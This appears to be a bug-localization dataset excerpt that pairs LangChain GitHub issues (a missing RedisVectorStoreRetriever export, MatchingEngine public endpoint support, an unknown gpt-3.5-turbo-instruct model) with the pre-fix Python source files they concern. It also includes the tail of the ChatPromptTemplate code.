Tuple[Type, str],
str,
]
class ChatPromptTemplate(BaseChatPromptTemplate):
"""A prompt template for chat models.
Use to create flexible templated prompts for chat models.
Examples:
.. code-block:: python
from langchain.prompts import ChatPromptTemplate
template = ChatPromptTemplate.from_messages([
("system", "You are a helpful AI bot. Your name is {name}."),
("human", "Hello, how are you doing?"),
("ai", "I'm doing well, thanks!"),
("human", "{user_input}"),
])
messages = template.format_messages(
name="Bob",
user_input="What is your name?"
)
"""
input_variables: List[str]
"""List of input variables in template messages. Used for validation."""
messages: List[MessageLike]
"""List of messages consisting of either message prompt templates or messages."""
def __add__(self, other: Any) -> ChatPromptTemplate:
"""Combine two prompt templates.
Args:
other: Another prompt template.
Returns:
Combined prompt template.
"""
# Allow for easy combining
if isinstance(other, ChatPromptTemplate):
return ChatPromptTemplate(messages=self.messages + other.messages)
elif isinstance(
other, (BaseMessagePromptTemplate, BaseMessage, BaseChatPromptTemplate)
):
return ChatPromptTemplate(messages=self.messages + [other])
elif isinstance(other, (list, tuple)):
_other = ChatPromptTemplate.from_messages(other)
return ChatPromptTemplate(messages=self.messages + _other.messages)
elif isinstance(other, str):
prompt = HumanMessagePromptTemplate.from_template(other)
return ChatPromptTemplate(messages=self.messages + [prompt])
else:
raise NotImplementedError(f"Unsupported operand type for +: {type(other)}")
@root_validator(pre=True)
def validate_input_variables(cls, values: dict) -> dict:
"""Validate input variables.
If input_variables is not set, it will be set to the union of
all input variables in the messages.
Args:
values: values to validate.
Returns:
Validated values.
"""
messages = values["messages"]
input_vars = set()
for message in messages:
if isinstance(message, (BaseMessagePromptTemplate, BaseChatPromptTemplate)):
input_vars.update(message.input_variables)
if "partial_variables" in values:
input_vars = input_vars - set(values["partial_variables"])
if "input_variables" in values:
if input_vars != set(values["input_variables"]):
raise ValueError(
"Got mismatched input_variables. "
f"Expected: {input_vars}. "
f"Got: {values['input_variables']}"
)
else:
values["input_variables"] = sorted(input_vars)
return values
@classmethod
def from_template(cls, template: str, **kwargs: Any) -> ChatPromptTemplate:
"""Create a chat prompt template from a template string.
Creates a chat template consisting of a single message assumed to be from
the human.
Args:
template: template string
**kwargs: keyword arguments to pass to the constructor.
Returns:
A new instance of this class.
"""
prompt_template = PromptTemplate.from_template(template, **kwargs)
message = HumanMessagePromptTemplate(prompt=prompt_template)
return cls.from_messages([message])
@classmethod
@deprecated("0.0.260", alternative="from_messages classmethod", pending=True)
def from_role_strings(
cls, string_messages: List[Tuple[str, str]]
) -> ChatPromptTemplate:
"""Create a chat prompt template from a list of (role, template) tuples.
Args:
string_messages: list of (role, template) tuples.
Returns:
a chat prompt template
"""
return cls(
messages=[
ChatMessagePromptTemplate.from_template(template, role=role)
for role, template in string_messages
]
)
@classmethod
@deprecated("0.0.260", alternative="from_messages classmethod", pending=True)
def from_strings(
cls, string_messages: List[Tuple[Type[BaseMessagePromptTemplate], str]]
) -> ChatPromptTemplate:
"""Create a chat prompt template from a list of (role class, template) tuples.
Args:
string_messages: list of (role class, template) tuples.
Returns:
a chat prompt template
"""
return cls.from_messages(string_messages)
@classmethod
def from_messages(
cls,
messages: Sequence[MessageLikeRepresentation],
) -> ChatPromptTemplate:
"""Create a chat prompt template from a variety of message formats.
Examples:
Instantiation from a list of message templates:
.. code-block:: python
template = ChatPromptTemplate.from_messages([
("human", "Hello, how are you?"),
("ai", "I'm doing well, thanks!"),
("human", "That's good to hear."),
])
Instantiation from mixed message formats:
.. code-block:: python
template = ChatPromptTemplate.from_messages([
SystemMessage(content="hello"),
("human", "Hello, how are you?"),
])
Args:
messages: sequence of message representations.
A message can be represented using the following formats:
(1) BaseMessagePromptTemplate, (2) BaseMessage, (3) 2-tuple of
(message type, template); e.g., ("human", "{user_input}"),
(4) 2-tuple of (message class, template), (4) a string which is
shorthand for ("human", template); e.g., "{user_input}"
Returns:
a chat prompt template
"""
_messages = [_convert_to_message(message) for message in messages]
# Automatically infer input variables from messages
input_vars: Set[str] = set()
for _message in _messages:
if isinstance(
_message, (BaseChatPromptTemplate, BaseMessagePromptTemplate)
):
input_vars.update(_message.input_variables)
return cls(input_variables=sorted(input_vars), messages=_messages)
def format(self, **kwargs: Any) -> str:
"""Format the chat template into a string.
Args:
**kwargs: keyword arguments to use for filling in template variables
in all the template messages in this chat template.
Returns:
formatted string
"""
return self.format_prompt(**kwargs).to_string()
def format_messages(self, **kwargs: Any) -> List[BaseMessage]:
"""Format the chat template into a list of finalized messages.
Args:
**kwargs: keyword arguments to use for filling in template variables
in all the template messages in this chat template.
Returns:
list of formatted messages
"""
kwargs = self._merge_partial_and_user_variables(**kwargs)
result = []
for message_template in self.messages:
if isinstance(message_template, BaseMessage):
result.extend([message_template])
elif isinstance(
message_template, (BaseMessagePromptTemplate, BaseChatPromptTemplate)
):
rel_params = {
k: v
for k, v in kwargs.items()
if k in message_template.input_variables
}
message = message_template.format_messages(**rel_params)
result.extend(message)
else:
raise ValueError(f"Unexpected input: {message_template}")
return result
def partial(self, **kwargs: Union[str, Callable[[], str]]) -> ChatPromptTemplate:
"""Get a new ChatPromptTemplate with some input variables already filled in.
Args:
**kwargs: keyword arguments to use for filling in template variables. Ought
to be a subset of the input variables.
Returns:
A new ChatPromptTemplate.
Example:
.. code-block:: python
from langchain.prompts import ChatPromptTemplate
template = ChatPromptTemplate.from_messages(
[
("system", "You are an AI assistant named {name}."),
("human", "Hi I'm {user}"),
("ai", "Hi there, {user}, I'm {name}."),
("human", "{input}"),
]
)
template2 = template.partial(user="Lucy", name="R2D2")
template2.format_messages(input="hello")
"""
prompt_dict = self.__dict__.copy()
prompt_dict["input_variables"] = list(
set(self.input_variables).difference(kwargs)
)
prompt_dict["partial_variables"] = {**self.partial_variables, **kwargs}
return type(self)(**prompt_dict)
def append(self, message: MessageLikeRepresentation) -> None:
"""Append message to the end of the chat template.
Args:
message: representation of a message to append.
"""
self.messages.append(_convert_to_message(message))
def extend(self, messages: Sequence[MessageLikeRepresentation]) -> None:
"""Extend the chat template with a sequence of messages."""
self.messages.extend([_convert_to_message(message) for message in messages])
@overload
def __getitem__(self, index: int) -> MessageLike:
...
@overload
def __getitem__(self, index: slice) -> ChatPromptTemplate:
...
def __getitem__(
self, index: Union[int, slice]
) -> Union[MessageLike, ChatPromptTemplate]:
"""Use to index into the chat template."""
if isinstance(index, slice):
start, stop, step = index.indices(len(self.messages))
messages = self.messages[start:stop:step]
return ChatPromptTemplate.from_messages(messages)
else:
return self.messages[index]
def __len__(self) -> int:
"""Get the length of the chat template."""
return len(self.messages)
@property
def _prompt_type(self) -> str:
"""Name of prompt type."""
return "chat"
def save(self, file_path: Union[Path, str]) -> None:
"""Save prompt to file.
Args:
file_path: path to file.
"""
raise NotImplementedError()
def _create_template_from_message_type(
message_type: str, template: str
) -> BaseMessagePromptTemplate:
"""Create a message prompt template from a message type and template string.
Args:
message_type: str the type of the message template (e.g., "human", "ai", etc.)
template: str the template string.
Returns:
a message prompt template of the appropriate type.
"""
if message_type in ("human", "user"):
message: BaseMessagePromptTemplate = HumanMessagePromptTemplate.from_template(
template
)
elif message_type in ("ai", "assistant"):
message = AIMessagePromptTemplate.from_template(template)
elif message_type == "system":
message = SystemMessagePromptTemplate.from_template(template)
else:
raise ValueError(
f"Unexpected message type: {message_type}. Use one of 'human',"
f" 'user', 'ai', 'assistant', or 'system'."
)
return message
def _convert_to_message(
message: MessageLikeRepresentation,
) -> Union[BaseMessage, BaseMessagePromptTemplate, BaseChatPromptTemplate]:
"""Instantiate a message from a variety of message formats.
The message format can be one of the following:
- BaseMessagePromptTemplate
- BaseMessage
- 2-tuple of (role string, template); e.g., ("human", "{user_input}")
- 2-tuple of (message class, template)
- string: shorthand for ("human", template); e.g., "{user_input}"
Args:
message: a representation of a message in one of the supported formats
Returns:
an instance of a message or a message template
"""
if isinstance(message, (BaseMessagePromptTemplate, BaseChatPromptTemplate)):
_message: Union[
BaseMessage, BaseMessagePromptTemplate, BaseChatPromptTemplate
] = message
elif isinstance(message, BaseMessage):
_message = message
elif isinstance(message, str):
_message = _create_template_from_message_type("human", message)
elif isinstance(message, tuple):
if len(message) != 2:
raise ValueError(f"Expected 2-tuple of (role, template), got {message}")
message_type_str, template = message
if isinstance(message_type_str, str):
_message = _create_template_from_message_type(message_type_str, template)
else:
_message = message_type_str(prompt=PromptTemplate.from_template(template))
else:
raise NotImplementedError(f"Unsupported message type: {type(message)}")
return _message
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,186 | Issue: RedisVectorStoreRetriever not accessible | ### Issue you'd like to raise.
After PR [#8612](https://github.com/langchain-ai/langchain/pull/8612), access to [RedisVectorStoreRetriever](https://github.com/langchain-ai/langchain/blob/27944cb611ee8face34fbe764c83e37841f96eb7/libs/langchain/langchain/vectorstores/redis/base.py#L1293) has been removed
### Suggestion:
Include **RedisVectorStoreRetriever** import in [redis/__init__.py](https://github.com/langchain-ai/langchain/blob/27944cb611ee8face34fbe764c83e37841f96eb7/libs/langchain/langchain/vectorstores/redis/__init__.py) on line 1
current: `from .base import Redis`
suggestion update: `from .base import Redis, RedisVectorStoreRetriever`
| https://github.com/langchain-ai/langchain/issues/10186 | https://github.com/langchain-ai/langchain/pull/10414 | d09ef9eb52466f991fc155567f234e5351f20d06 | 65e1606daa696e2190fcb410f190c6811f9f8dc3 | "2023-09-04T14:21:34Z" | python | "2023-09-10T00:46:34Z" | libs/langchain/langchain/vectorstores/redis/__init__.py | from .base import Redis
from .filters import (
RedisFilter,
RedisNum,
RedisTag,
RedisText,
)
__all__ = ["Redis", "RedisFilter", "RedisTag", "RedisText", "RedisNum"]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,378 | GCP Matching Engine support for public index endpoints | ### System Info
langchain==0.0.244
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Create a new Matching Engine Index Endpoint that is public.
Follow the tutorial to make a similarity search:
```
vector_store = MatchingEngine.from_components(
project_id="",
region="us-central1",
gcs_bucket_name="",
index_id="",
endpoint_id="",
embedding=embeddings,
)
vector_store.similarity_search("what is a cat?", k=5)
```
Error:
```
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression)
1021 def __call__(self,
1022 request: Any,
1023 timeout: Optional[float] = None,
(...)
1026 wait_for_ready: Optional[bool] = None,
1027 compression: Optional[grpc.Compression] = None) -> Any:
1028 state, call, = self._blocking(request, timeout, metadata, credentials,
1029 wait_for_ready, compression)
-> 1030 return _end_unary_response_blocking(state, call, False, None)
File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline)
908 return state.response
909 else:
--> 910 raise _InactiveRpcError(state)
_InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNAVAILABLE
details = "DNS resolution failed for :10000: unparseable host:port"
debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}"
>
```
### Expected behavior
It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function.
I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
| https://github.com/langchain-ai/langchain/issues/8378 | https://github.com/langchain-ai/langchain/pull/10056 | 4f19ba306597eb753ea397d4b646dc75c2668cbe | 21b236e5e4fc5c6e22bab61967b6e56895c4fa15 | "2023-07-27T20:14:21Z" | python | "2023-09-19T23:16:04Z" | libs/langchain/langchain/vectorstores/matching_engine.py | from __future__ import annotations
import json
import logging
import time
import uuid
from typing import TYPE_CHECKING, Any, Iterable, List, Optional, Type
from langchain.docstore.document import Document
from langchain.embeddings import TensorflowHubEmbeddings
from langchain.schema.embeddings import Embeddings
from langchain.vectorstores.base import VectorStore
if TYPE_CHECKING:
from google.cloud import storage
from google.cloud.aiplatform import MatchingEngineIndex, MatchingEngineIndexEndpoint
from google.oauth2.service_account import Credentials
logger = logging.getLogger()
class MatchingEngine(VectorStore):
"""`Google Vertex AI Matching Engine` vector store.
While the embeddings are stored in the Matching Engine, the embedded
documents will be stored in GCS.
An existing Index and corresponding Endpoint are preconditions for
using this module.
See usage in docs/modules/indexes/vectorstores/examples/matchingengine.ipynb
Note that this implementation is mostly meant for reading if you are
planning to do a real time implementation. While reading is a real time
operation, updating the index takes close to one hour."""
def __init__(
self,
project_id: str,
index: MatchingEngineIndex,
endpoint: MatchingEngineIndexEndpoint,
embedding: Embeddings,
gcs_client: storage.Client,
gcs_bucket_name: str,
credentials: Optional[Credentials] = None,
):
"""Vertex Matching Engine implementation of the vector store.
While the embeddings are stored in the Matching Engine, the embedded
documents will be stored in GCS.
An existing Index and corresponding Endpoint are preconditions for
using this module.
See usage in
docs/modules/indexes/vectorstores/examples/matchingengine.ipynb.
Note that this implementation is mostly meant for reading if you are
planning to do a real time implementation. While reading is a real time
operation, updating the index takes close to one hour.
Attributes:
project_id: The GCS project id.
index: The created index class. See
~:func:`MatchingEngine.from_components`.
endpoint: The created endpoint class. See
~:func:`MatchingEngine.from_components`.
embedding: A :class:`Embeddings` that will be used for
embedding the text sent. If none is sent, then the
multilingual Tensorflow Universal Sentence Encoder will be used.
gcs_client: The GCS client.
gcs_bucket_name: The GCS bucket name.
credentials (Optional): Created GCP credentials.
"""
super().__init__()
self._validate_google_libraries_installation()
self.project_id = project_id
self.index = index
self.endpoint = endpoint
self.embedding = embedding
self.gcs_client = gcs_client
self.credentials = credentials
self.gcs_bucket_name = gcs_bucket_name
@property
def embeddings(self) -> Embeddings:
return self.embedding
def _validate_google_libraries_installation(self) -> None:
"""Validates that Google libraries that are needed are installed."""
try:
from google.cloud import aiplatform, storage # noqa: F401
from google.oauth2 import service_account # noqa: F401
except ImportError:
raise ImportError(
"You must run `pip install --upgrade "
"google-cloud-aiplatform google-cloud-storage`"
"to use the MatchingEngine Vectorstore."
)
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
kwargs: vectorstore specific parameters.
Returns:
List of ids from adding the texts into the vectorstore.
"""
logger.debug("Embedding documents.")
embeddings = self.embedding.embed_documents(list(texts))
jsons = []
ids = []
# Could be improved with async.
for embedding, text in zip(embeddings, texts):
id = str(uuid.uuid4())
ids.append(id)
jsons.append({"id": id, "embedding": embedding})
self._upload_to_gcs(text, f"documents/{id}")
logger.debug(f"Uploaded {len(ids)} documents to GCS.")
# Creating json lines from the embedded documents.
result_str = "\n".join([json.dumps(x) for x in jsons])
filename_prefix = f"indexes/{uuid.uuid4()}"
filename = f"{filename_prefix}/{time.time()}.json"
self._upload_to_gcs(result_str, filename)
logger.debug(
f"Uploaded updated json with embeddings to "
f"{self.gcs_bucket_name}/{filename}."
)
self.index = self.index.update_embeddings(
contents_delta_uri=f"gs://{self.gcs_bucket_name}/{filename_prefix}/"
)
logger.debug("Updated index with new configuration.")
return ids
def _upload_to_gcs(self, data: str, gcs_location: str) -> None:
"""Uploads data to gcs_location.
Args:
data: The data that will be stored.
gcs_location: The location where the data will be stored.
"""
bucket = self.gcs_client.get_bucket(self.gcs_bucket_name)
blob = bucket.blob(gcs_location)
blob.upload_from_string(data)
def similarity_search(
self, query: str, k: int = 4, **kwargs: Any
) -> List[Document]:
"""Return docs most similar to query.
Args:
query: The string that will be used to search for similar documents.
k: The amount of neighbors that will be retrieved.
Returns:
A list of k matching documents.
"""
logger.debug(f"Embedding query {query}.")
embedding_query = self.embedding.embed_documents([query])
response = self.endpoint.match(
deployed_index_id=self._get_index_id(),
queries=embedding_query,
num_neighbors=k,
)
if len(response) == 0:
return []
logger.debug(f"Found {len(response)} matches for the query {query}.")
results = []
# I'm only getting the first one because queries receives an array
# and the similarity_search method only receives one query. This
# means that the match method will always return an array with only
# one element.
for doc in response[0]:
page_content = self._download_from_gcs(f"documents/{doc.id}")
results.append(Document(page_content=page_content))
logger.debug("Downloaded documents for query.")
return results
def _get_index_id(self) -> str:
"""Gets the correct index id for the endpoint.
Returns:
The index id if found (which should be found) or throws
ValueError otherwise.
"""
for index in self.endpoint.deployed_indexes:
if index.index == self.index.resource_name:
return index.id
raise ValueError(
f"No index with id {self.index.resource_name} "
f"deployed on endpoint "
f"{self.endpoint.display_name}."
)
def _download_from_gcs(self, gcs_location: str) -> str:
"""Downloads from GCS in text format.
Args:
gcs_location: The location where the file is located.
Returns:
The string contents of the file.
"""
bucket = self.gcs_client.get_bucket(self.gcs_bucket_name)
blob = bucket.blob(gcs_location)
return blob.download_as_string()
@classmethod
def from_texts(
cls: Type["MatchingEngine"],
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
**kwargs: Any,
) -> "MatchingEngine":
"""Use from components instead."""
raise NotImplementedError(
"This method is not implemented. Instead, you should initialize the class"
" with `MatchingEngine.from_components(...)` and then call "
"`add_texts`"
)
@classmethod
def from_components(
cls: Type["MatchingEngine"],
project_id: str,
region: str,
gcs_bucket_name: str,
index_id: str,
endpoint_id: str,
credentials_path: Optional[str] = None,
embedding: Optional[Embeddings] = None,
) -> "MatchingEngine":
"""Takes the object creation out of the constructor.
Args:
project_id: The GCP project id.
region: The default location making the API calls. It must have
the same location as the GCS bucket and must be regional.
gcs_bucket_name: The location where the vectors will be stored in
order for the index to be created.
index_id: The id of the created index.
endpoint_id: The id of the created endpoint.
credentials_path: (Optional) The path of the Google credentials on
the local file system.
embedding: The :class:`Embeddings` that will be used for
embedding the texts.
Returns:
A configured MatchingEngine with the texts added to the index.
"""
gcs_bucket_name = cls._validate_gcs_bucket(gcs_bucket_name)
credentials = cls._create_credentials_from_file(credentials_path)
index = cls._create_index_by_id(index_id, project_id, region, credentials)
endpoint = cls._create_endpoint_by_id(
endpoint_id, project_id, region, credentials
)
gcs_client = cls._get_gcs_client(credentials, project_id)
cls._init_aiplatform(project_id, region, gcs_bucket_name, credentials)
return cls(
project_id=project_id,
index=index,
endpoint=endpoint,
embedding=embedding or cls._get_default_embeddings(),
gcs_client=gcs_client,
credentials=credentials,
gcs_bucket_name=gcs_bucket_name,
)
@classmethod
def _validate_gcs_bucket(cls, gcs_bucket_name: str) -> str:
"""Validates the gcs_bucket_name as a bucket name.
Args:
gcs_bucket_name: The received bucket uri.
Returns:
A valid gcs_bucket_name or throws ValueError if full path is
provided.
"""
gcs_bucket_name = gcs_bucket_name.replace("gs://", "")
if "/" in gcs_bucket_name:
raise ValueError(
f"The argument gcs_bucket_name should only be "
f"the bucket name. Received {gcs_bucket_name}"
)
return gcs_bucket_name
@classmethod
def _create_credentials_from_file(
cls, json_credentials_path: Optional[str]
) -> Optional[Credentials]:
"""Creates credentials for GCP.
Args:
json_credentials_path: The path on the file system where the
credentials are stored.
Returns:
An optional of Credentials or None, in which case the default
will be used.
"""
from google.oauth2 import service_account
credentials = None
if json_credentials_path is not None:
credentials = service_account.Credentials.from_service_account_file(
json_credentials_path
)
return credentials
@classmethod
def _create_index_by_id(
cls, index_id: str, project_id: str, region: str, credentials: "Credentials"
) -> MatchingEngineIndex:
"""Creates a MatchingEngineIndex object by id.
Args:
index_id: The created index id.
project_id: The project to retrieve index from.
region: Location to retrieve index from.
credentials: GCS credentials.
Returns:
A configured MatchingEngineIndex.
"""
from google.cloud import aiplatform
logger.debug(f"Creating matching engine index with id {index_id}.")
return aiplatform.MatchingEngineIndex(
index_name=index_id,
project=project_id,
location=region,
credentials=credentials,
)
@classmethod
def _create_endpoint_by_id(
cls, endpoint_id: str, project_id: str, region: str, credentials: "Credentials"
) -> MatchingEngineIndexEndpoint:
"""Creates a MatchingEngineIndexEndpoint object by id.
Args:
endpoint_id: The created endpoint id.
project_id: The project to retrieve index from.
region: Location to retrieve index from.
credentials: GCS credentials.
Returns:
A configured MatchingEngineIndexEndpoint.
"""
from google.cloud import aiplatform
logger.debug(f"Creating endpoint with id {endpoint_id}.")
return aiplatform.MatchingEngineIndexEndpoint(
index_endpoint_name=endpoint_id,
project=project_id,
location=region,
credentials=credentials,
)
@classmethod
def _get_gcs_client(
cls, credentials: "Credentials", project_id: str
) -> "storage.Client":
"""Lazily creates a GCS client.
Returns:
A configured GCS client.
"""
from google.cloud import storage
return storage.Client(credentials=credentials, project=project_id)
@classmethod
def _init_aiplatform(
cls,
project_id: str,
region: str,
gcs_bucket_name: str,
credentials: "Credentials",
) -> None:
"""Configures the aiplatform library.
Args:
project_id: The GCP project id.
region: The default location making the API calls. It must have
the same location as the GCS bucket and must be regional.
gcs_bucket_name: GCS staging location.
credentials: The GCS Credentials object.
"""
from google.cloud import aiplatform
logger.debug(
f"Initializing AI Platform for project {project_id} on "
f"{region} and for {gcs_bucket_name}."
)
aiplatform.init(
project=project_id,
location=region,
staging_bucket=gcs_bucket_name,
credentials=credentials,
)
@classmethod
def _get_default_embeddings(cls) -> TensorflowHubEmbeddings:
"""This function returns the default embedding.
Returns:
Default TensorflowHubEmbeddings to use.
"""
return TensorflowHubEmbeddings()
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | from __future__ import annotations
import logging
import sys
import warnings
from typing import (
AbstractSet,
Any,
AsyncIterator,
Callable,
Collection,
Dict,
Iterator,
List,
Literal,
Mapping,
Optional,
Set,
Tuple,
Union,
)
from langchain.callbacks.manager import (
AsyncCallbackManagerForLLMRun,
CallbackManagerForLLMRun,
)
from langchain.llms.base import BaseLLM, create_base_retry_decorator
from langchain.pydantic_v1 import Field, root_validator
from langchain.schema import Generation, LLMResult
from langchain.schema.output import GenerationChunk
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
from langchain.utils.utils import build_extra_kwargs
logger = logging.getLogger(__name__)
def update_token_usage(
keys: Set[str], response: Dict[str, Any], token_usage: Dict[str, Any]
) -> None:
"""Update token usage."""
_keys_to_use = keys.intersection(response["usage"])
for _key in _keys_to_use:
if _key not in token_usage:
token_usage[_key] = response["usage"][_key]
else:
token_usage[_key] += response["usage"][_key]
def _stream_response_to_generation_chunk(
stream_response: Dict[str, Any],
) -> GenerationChunk:
"""Convert a stream response to a generation chunk."""
return GenerationChunk(
text=stream_response["choices"][0]["text"],
generation_info=dict(
finish_reason=stream_response["choices"][0].get("finish_reason", None),
logprobs=stream_response["choices"][0].get("logprobs", None),
),
)
def _update_response(response: Dict[str, Any], stream_response: Dict[str, Any]) -> None:
"""Update response from the stream response."""
response["choices"][0]["text"] += stream_response["choices"][0]["text"]
response["choices"][0]["finish_reason"] = stream_response["choices"][0].get(
"finish_reason", None
)
response["choices"][0]["logprobs"] = stream_response["choices"][0]["logprobs"]
def _streaming_response_template() -> Dict[str, Any]:
return {
"choices": [
{
"text": "",
"finish_reason": None,
"logprobs": None,
}
]
}
def _create_retry_decorator(
llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[
Union[AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun]
] = None,
) -> Callable[[Any], Any]:
import openai
errors = [
openai.error.Timeout,
openai.error.APIError,
openai.error.APIConnectionError,
openai.error.RateLimitError,
openai.error.ServiceUnavailableError,
]
return create_base_retry_decorator(
error_types=errors, max_retries=llm.max_retries, run_manager=run_manager
)
def completion_with_retry(
llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Any:
"""Use tenacity to retry the completion call."""
retry_decorator = _create_retry_decorator(llm, run_manager=run_manager)
@retry_decorator
def _completion_with_retry(**kwargs: Any) -> Any:
return llm.client.create(**kwargs)
return _completion_with_retry(**kwargs)
async def acompletion_with_retry(
llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Any:
"""Use tenacity to retry the async completion call."""
retry_decorator = _create_retry_decorator(llm, run_manager=run_manager)
@retry_decorator
async def _completion_with_retry(**kwargs: Any) -> Any:
# Use OpenAI's async api https://github.com/openai/openai-python#async-api
return await llm.client.acreate(**kwargs)
return await _completion_with_retry(**kwargs)
class BaseOpenAI(BaseLLM):
"""Base OpenAI large language model class."""
@property
def lc_secrets(self) -> Dict[str, str]:
return {"openai_api_key": "OPENAI_API_KEY"}
@property
def lc_serializable(self) -> bool:
return True
client: Any = None #: :meta private:
model_name: str = Field(default="text-davinci-003", alias="model")
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
max_tokens: int = 256
"""The maximum number of tokens to generate in the completion.
-1 returns as many tokens as possible given the prompt and
the models maximal context size."""
top_p: float = 1
"""Total probability mass of tokens to consider at each step."""
frequency_penalty: float = 0
"""Penalizes repeated tokens according to frequency."""
presence_penalty: float = 0
"""Penalizes repeated tokens."""
n: int = 1
"""How many completions to generate for each prompt."""
best_of: int = 1
"""Generates best_of completions server-side and returns the "best"."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
openai_api_key: Optional[str] = None
openai_api_base: Optional[str] = None
openai_organization: Optional[str] = None
# to support explicit proxy for OpenAI
openai_proxy: Optional[str] = None
batch_size: int = 20
"""Batch size to use when passing multiple documents to generate."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout for requests to OpenAI completion API. Default is 600 seconds."""
logit_bias: Optional[Dict[str, float]] = Field(default_factory=dict)
"""Adjust the probability of specific tokens being generated."""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
streaming: bool = False
"""Whether to stream the results or not."""
allowed_special: Union[Literal["all"], AbstractSet[str]] = set()
"""Set of special tokens that are allowed。"""
disallowed_special: Union[Literal["all"], Collection[str]] = "all"
"""Set of special tokens that are not allowed。"""
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
def __new__(cls, **data: Any) -> Union[OpenAIChat, BaseOpenAI]: # type: ignore
"""Initialize the OpenAI object."""
model_name = data.get("model_name", "")
if (
model_name.startswith("gpt-3.5-turbo") or model_name.startswith("gpt-4")
) and "-instruct" not in model_name:
warnings.warn(
"You are trying to use a chat model. This way of initializing it is "
"no longer supported. Instead, please use: "
"`from langchain.chat_models import ChatOpenAI`"
)
return OpenAIChat(**data)
return super().__new__(cls)
class Config:
"""Configuration for this pydantic object."""
allow_population_by_field_name = True
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
values["model_kwargs"] = build_extra_kwargs(
extra, values, all_required_field_names
)
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
